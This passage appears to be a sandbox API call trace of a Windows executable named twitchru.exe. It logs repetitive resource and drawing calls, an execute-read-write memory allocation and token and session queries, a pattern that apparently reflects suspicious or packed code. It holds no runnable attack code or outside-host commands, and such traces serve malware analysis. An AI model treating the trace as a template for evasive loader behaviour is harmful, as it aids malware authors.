(hResData=0x0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.122] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.122] LockResource (hResData=0x0) returned 0x0 [0070.122] FreeResource (hResData=0x0) returned 0 [0070.122] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.122] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.122] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.123] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.123] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.125] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.125] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] GetSysColor (nIndex=17) returned 0x6d6d6d [0070.126] SetTextColor (hdc=0x0, color=0x6d6d6d) returned 0xffffffff [0070.126] lstrlenA (lpString="") returned 0 [0070.126] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] lstrlenA (lpString="") returned 0 [0070.127] StrCmpNIA (lpStr1="", lpStr2="", nChar=0) returned 0 [0070.127] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x20bc934 | out: lpBuffer="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\") returned 0x25 [0070.127] GetDC (hWnd=0x0) returned 0xa0100d0 [0070.127] GetTextMetricsW (in: hdc=0xa0100d0, lptm=0x20bd250 | out: lptm=0x20bd250) returned 1 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.127] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.128] MoveToEx (in: hdc=0x0, x=12, y=22, lppt=0x0 | out: lppt=0x0) returned 0 [0070.222] CreateToolbarEx (hwnd=0x0, ws=0xffff0082, wID=0x0, nBitmaps=636121, hBMInst=0x0, wBMID=0x1, lpButtons=0x20bf72c, iNumButtons=1, dxButton=0, dyButton=636121, dxBitmap=0, dyBitmap=636121, uStructSize=0x14) returned 0x40170 [0071.218] BeginPaint (in: hWnd=0x0, lpPaint=0x20bcb3c | out: lpPaint=0x20bcb3c) returned 0x0 [0071.218] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x20bcbf4, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\twitchru.exe")) returned 0x2a [0071.219] PathRemoveFileSpecW (in: pszPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\twitchru.exe" | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0071.219] SystemParametersInfoA (in: uiAction=0x29, uiParam=0x0, pvParam=0x20bc61c, fWinIni=0x0 | out: pvParam=0x20bc61c) returned 0 [0071.219] SelectObject (hdc=0xa0100d0, h=0x0) returned 0x0 [0071.219] DeleteObject (ho=0x0) returned 0 [0071.219] GetStockObject (i=0) returned 0x1900010 [0071.219] FillRgn (hdc=0xa0100d0, hrgn=0x77e, hbr=0x1900010) returned 0 [0071.219] GetLastError () returned 0x0 [0071.219] SetLastError (dwErrCode=0x0) [0071.219] LoadImageA (hInst=0x400000, name=0x82, type=0x0, cx=0, cy=0, fuLoad=0x0) returned 0x0 [0071.219] VirtualAlloc (lpAddress=0x0, dwSize=0xc000, flAllocationType=0x3000, flProtect=0x40) returned 0x25d0000 [0071.220] EndPaint (hWnd=0x0, lpPaint=0x20bcb3c) returned 0 [0071.221] CreateCompatibleDC (hdc=0x0) returned 0xa01074f [0071.221] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.230] SelectObject (hdc=0xa01074f, h=0x0) returned 0x0 [0071.230] CreateCompatibleDC (hdc=0x0) returned 0x22010749 [0071.230] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.233] SelectObject (hdc=0x22010749, h=0x0) returned 0x0 [0071.233] CreateCompatibleDC (hdc=0x0) returned 0x6701073c [0071.233] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.236] SelectObject (hdc=0x6701073c, h=0x0) returned 0x0 [0071.236] CreateCompatibleDC (hdc=0x0) returned 0x9010623 [0071.236] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.257] SelectObject (hdc=0x9010623, h=0x0) returned 0x0 [0071.257] CreateCompatibleDC (hdc=0x0) returned 0x1c010757 [0071.257] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.260] SelectObject (hdc=0x1c010757, h=0x0) returned 0x0 [0071.260] CreateCompatibleDC (hdc=0x0) returned 0x20010756 [0071.260] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.262] SelectObject (hdc=0x20010756, h=0x0) returned 0x0 [0071.262] CreateCompatibleDC (hdc=0x0) returned 0x11010767 [0071.264] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.266] SelectObject (hdc=0x11010767, h=0x0) returned 0x0 [0071.266] CreateCompatibleDC (hdc=0x0) returned 0x601075f [0071.266] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.274] SelectObject (hdc=0x601075f, h=0x0) returned 0x0 [0071.274] CreateCompatibleDC (hdc=0x0) returned 0x20010747 [0071.274] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.277] SelectObject (hdc=0x20010747, h=0x0) returned 0x0 [0071.277] CreateCompatibleDC (hdc=0x0) returned 0x7010762 [0071.277] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.279] SelectObject (hdc=0x7010762, h=0x0) returned 0x0 [0071.279] CreateCompatibleDC (hdc=0x0) returned 0x24010559 [0071.279] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.282] SelectObject (hdc=0x24010559, h=0x0) returned 0x0 [0071.282] CreateCompatibleDC (hdc=0x0) returned 0x530105e1 [0071.282] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.287] SelectObject (hdc=0x530105e1, h=0x0) returned 0x0 [0071.287] CreateCompatibleDC (hdc=0x0) returned 0x10010769 [0071.287] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.290] SelectObject (hdc=0x10010769, h=0x0) returned 0x0 [0071.290] CreateCompatibleDC (hdc=0x0) returned 0x901076a [0071.290] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.292] SelectObject (hdc=0x901076a, h=0x0) returned 0x0 [0071.292] CreateCompatibleDC (hdc=0x0) returned 0x101076b [0071.293] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.295] SelectObject (hdc=0x101076b, h=0x0) returned 0x0 [0071.295] CreateCompatibleDC (hdc=0x0) returned 0x101076c [0071.295] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.298] SelectObject (hdc=0x101076c, h=0x0) returned 0x0 [0071.298] CreateCompatibleDC (hdc=0x0) returned 0x101076d [0071.298] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.302] SelectObject (hdc=0x101076d, h=0x0) returned 0x0 [0071.302] CreateCompatibleDC (hdc=0x0) returned 0x201076f [0071.302] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.305] SelectObject (hdc=0x201076f, h=0x0) returned 0x0 [0071.305] CreateCompatibleDC (hdc=0x0) returned 0x2010770 [0071.305] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.308] SelectObject (hdc=0x2010770, h=0x0) returned 0x0 [0071.308] CreateCompatibleDC (hdc=0x0) returned 0x201076e [0071.308] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.310] SelectObject (hdc=0x201076e, h=0x0) returned 0x0 [0071.310] CreateCompatibleDC (hdc=0x0) returned 0x8010771 [0071.311] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.314] SelectObject (hdc=0x8010771, h=0x0) returned 0x0 [0071.314] CreateCompatibleDC (hdc=0x0) returned 0xe010772 [0071.314] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.319] SelectObject (hdc=0xe010772, h=0x0) returned 0x0 [0071.319] CreateCompatibleDC (hdc=0x0) returned 0x2010774 [0071.319] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.322] SelectObject (hdc=0x2010774, h=0x0) returned 0x0 [0071.322] CreateCompatibleDC (hdc=0x0) returned 0x2010775 [0071.322] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.324] SelectObject (hdc=0x2010775, h=0x0) returned 0x0 [0071.324] CreateCompatibleDC (hdc=0x0) returned 0x9010773 [0071.324] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.327] SelectObject (hdc=0x9010773, h=0x0) returned 0x0 [0071.327] CreateCompatibleDC (hdc=0x0) returned 0x8010776 [0071.327] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.329] SelectObject (hdc=0x8010776, h=0x0) returned 0x0 [0071.329] CreateCompatibleDC (hdc=0x0) returned 0xe010777 [0071.330] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.335] SelectObject (hdc=0xe010777, h=0x0) returned 0x0 [0071.335] CreateCompatibleDC (hdc=0x0) returned 0x2010779 [0071.335] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.338] SelectObject (hdc=0x2010779, h=0x0) returned 0x0 [0071.338] CreateCompatibleDC (hdc=0x0) returned 0x201077a [0071.338] LoadImageA (hInst=0x0, name="bmp", type=0x0, cx=0, cy=0, fuLoad=0x10) returned 0x0 [0071.340] SelectObject (hdc=0x201077a, h=0x0) returned 0x0 [0071.340] LoadIconA (hInstance=0x0, lpIconName=0x7f00) returned 0x10027 [0071.341] LoadCursorA (hInstance=0x0, lpCursorName=0x7f00) returned 0x10003 [0071.341] GetStockObject (i=0) returned 0x1900010 [0071.341] RegisterClassA (lpWndClass=0x20bbf8c) returned 0xc16d [0071.341] CreateWindowExA (dwExStyle=0x0, lpClassName="EndJoin", lpWindowName="End", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=-2147483648, nHeight=-2147483648, hWndParent=0x0, hMenu=0x0, hInstance=0x400000, lpParam=0x0) returned 0x0 [0071.343] ShowWindow (hWnd=0x0, nCmdShow=1) returned 0 [0071.343] UpdateWindow (hWnd=0x0) returned 0 [0071.343] NtdllDefWindowProc_A (hWnd=0x0, Msg=0x0, wParam=0x1, lParam=0x1) returned 0x0 [0071.343] CreateFileA (lpFileName="", dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.343] ReadFile (in: hFile=0xffffffff, lpBuffer=0x20bb8cc, nNumberOfBytesToRead=0xe, lpNumberOfBytesRead=0x20bb8dc, lpOverlapped=0x0 | out: lpBuffer=0x20bb8cc, lpNumberOfBytesRead=0x20bb8dc*=0x0, lpOverlapped=0x0) returned 0 [0071.343] CloseHandle (hObject=0xffffffff) returned 1 [0071.345] GetDesktopWindow () returned 0x10010 [0071.345] GetWindowRgn (hWnd=0x10010, hRgn=0x77cdaeb6) returned 0 [0071.345] GetDesktopWindow () returned 0x10010 [0071.345] GetDCEx (hWnd=0x10010, hrgnClip=0x77cdaeb6, flags=0x1) returned 0x0 [0071.345] GetCursorPos (in: lpPoint=0x20ba660 | out: lpPoint=0x20ba660*(x=1185, y=529)) returned 1 [0071.345] wsprintfA (in: param_1=0x20ba6c4, param_2="%d %d %d" | out: param_1="255 255 255") returned 11 [0071.345] CreateStdAccessibleObject () returned 0x80004005 [0071.352] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.352] TextOutW (hdc=0x0, x=94, y=-1, lpString="", c=0) returned 1 [0071.352] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.352] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.352] GetTickCount () returned 0x1eeef [0071.360] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.360] SetForegroundWindow (hWnd=0x0) returned 0 [0071.360] BringWindowToTop (hWnd=0x0) returned 0 [0071.360] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x230) returned 1 [0071.360] GetTokenInformation (in: TokenHandle=0x230, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.361] GetLastError () returned 0x7a [0071.361] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.361] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.582] WTSFreeMemory (pMemory=0x0) [0071.582] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.582] TextOutW (hdc=0x0, x=104, y=24, lpString="", c=0) returned 1 [0071.582] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.582] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.582] GetTickCount () returned 0x1efd9 [0071.586] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.586] SetForegroundWindow (hWnd=0x0) returned 0 [0071.586] BringWindowToTop (hWnd=0x0) returned 0 [0071.586] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x258) returned 1 [0071.587] GetTokenInformation (in: TokenHandle=0x258, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.587] GetLastError () returned 0x7a [0071.587] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.587] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.587] WTSFreeMemory (pMemory=0x0) [0071.587] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.588] TextOutW (hdc=0x0, x=114, y=49, lpString="", c=0) returned 1 [0071.588] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.588] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.588] GetTickCount () returned 0x1efd9 [0071.591] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.591] SetForegroundWindow (hWnd=0x0) returned 0 [0071.591] BringWindowToTop (hWnd=0x0) returned 0 [0071.591] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x25c) returned 1 [0071.591] GetTokenInformation (in: TokenHandle=0x25c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.591] GetLastError () returned 0x7a [0071.591] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.591] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.592] WTSFreeMemory (pMemory=0x0) [0071.592] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.592] TextOutW (hdc=0x0, x=124, y=74, lpString="", c=0) returned 1 [0071.592] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.592] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.592] GetTickCount () returned 0x1efd9 [0071.617] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.617] SetForegroundWindow (hWnd=0x0) returned 0 [0071.617] BringWindowToTop (hWnd=0x0) returned 0 [0071.617] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x260) returned 1 [0071.617] GetTokenInformation (in: TokenHandle=0x260, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.617] GetLastError () returned 0x7a [0071.617] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.617] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.618] WTSFreeMemory (pMemory=0x0) [0071.618] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.618] TextOutW (hdc=0x0, x=134, y=99, lpString="", c=0) returned 1 [0071.618] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.618] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.618] GetTickCount () returned 0x1eff8 [0071.622] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.622] SetForegroundWindow (hWnd=0x0) returned 0 [0071.622] BringWindowToTop (hWnd=0x0) returned 0 [0071.622] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x264) returned 1 [0071.622] GetTokenInformation (in: TokenHandle=0x264, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.622] GetLastError () returned 0x7a [0071.622] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.622] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.623] WTSFreeMemory (pMemory=0x0) [0071.623] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.623] TextOutW (hdc=0x0, x=144, y=124, lpString="", c=0) returned 1 [0071.623] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.623] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.623] GetTickCount () returned 0x1eff8 [0071.627] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.627] SetForegroundWindow (hWnd=0x0) returned 0 [0071.627] BringWindowToTop (hWnd=0x0) returned 0 [0071.627] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x268) returned 1 [0071.627] GetTokenInformation (in: TokenHandle=0x268, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.627] GetLastError () returned 0x7a [0071.627] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.627] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.628] WTSFreeMemory (pMemory=0x0) [0071.628] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.628] TextOutW (hdc=0x0, x=154, y=149, lpString="", c=0) returned 1 [0071.628] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.628] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.636] GetTickCount () returned 0x1f008 [0071.639] SwitchToThisWindow (hwnd=0x0, 